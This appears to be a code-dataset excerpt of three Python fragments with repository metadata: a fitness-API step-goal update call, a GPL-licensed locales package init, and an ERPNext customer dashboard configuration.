"steps", "value" : new_step_goal } auth_headers = {"Authorization": "Bearer " + fb_token} response = requests.post(url, headers=auth_headers, params=params) if response.status_code == 200: return response.json()["goals"]["steps"]
jazzij/powertoken
powertoken/api_util.py
Python
mit
4,691
# -*- coding: utf-8 -*- # # Copyright (c) 2011, 2012 Carlos Jenkins <cjenkins@softwarelibrecr.org> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/> from .locales import *
carlos-jenkins/nested
nested/modules/locales/__init__.py
Python
gpl-2.0
822
from frappe import _ def get_data(): return { 'heatmap': True, 'heatmap_message': _('This is based on transactions against this Customer. See timeline below for details'), 'fieldname': 'customer', 'transactions': [ { 'label': _('Pre Sales'), 'items': ['Opportunity', 'Quotation'] }, { 'label': _('Orders'), 'items': ['Sales Order', 'Delivery Note', 'Sales Invoice'] }, { 'label': _('Support'), 'items': ['Issue'] }, { 'label': _('Projects'), 'items': ['Project'] }, { 'label': _('Pricing'), 'items': ['Pricing Rule'] }, { 'label': _('Subscriptions'), 'items': ['Subscription'] } ] }
patilsangram/erpnext
erpnext/selling/doctype/customer/customer_dashboard.py
Python
gpl-3.0
679